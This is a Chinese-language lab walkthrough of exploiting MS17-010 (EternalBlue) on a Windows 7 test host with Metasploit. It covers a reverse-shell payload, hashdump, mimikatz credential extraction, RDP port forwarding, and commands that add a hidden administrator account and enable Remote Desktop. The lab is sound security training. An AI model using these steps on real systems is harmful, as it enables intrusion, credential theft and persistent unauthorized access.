MS17-010远程溢出漏洞(永恒之蓝)
实验环境
操作机:kali 2017
操作机IP:172.16.11.2
目标机:windows7
目标机IP:172.16.12.2
打开nmap进行扫描目标主机开放哪些端口
终端打开msfconsole
使用search 命令查找ms17-010漏洞相关模块
使用use 命令选择我们要使用的扫描模块
在运行模块之前,需要设置相关选项,我们使用show options 查看配置信息
需要设置目标地址,设置命令
设置完成后,执行run 或exploit命令,等执行结果
从上一步可以看出,该漏洞可以被利用,接下来,我们使用漏洞利用模块
show options 查看
目标机,host地址172.16.12.2
set RHOST 172.16.12.2
选择载荷payload,也就是shellcode。此处我们选择回连控制端shell的payload
同样,载荷也需要进行配置,show options查看配置信息
配置中缺少本地主机RHOST,设置一下
完成后运行run或exploit
我们已经成功获取Session会话了,本次我们继续获取目标机hash值,执行hashdump
mimikatz是一个知名的密码提取神器。它支持从Windows系统内存中提取明文密码、哈希、PIN码和Kerberos凭证等,meterpreter中正集成了这款工具。
执行load mimikatz即可加载该工具,其命令与mimikatz一样(可能不行,一般是弱命令)
然后执行kerberos即可获得目标机账号密码
获取了目标机的账号密码,我们结合nmap的扫描结果,可以远程登陆目标机 但是现实中,防火墙一般会拦截外来3389端口的访问请求,这种情况下该怎么解决呢?
我们可以使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接
运行命令:portfwd add -l 3389 -L 127.0.0.1 -p 3389 -r 172.16.12.2
此处,我们将远程目标的3389端口,转发到本机 172.16.11.2的3389上
本地端口号可设置为其他未监听的端口
如此,我们只要执行
rdesktop 127.0.0.1 -u ichunqiu -p ichunqiu
即可登陆远程目标机器
1.shell进入C盘
2net user 用户名 密码 /add
3.net localgroup Administrators 用户名 /add
4.REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
5.net -ano | findstr "3389"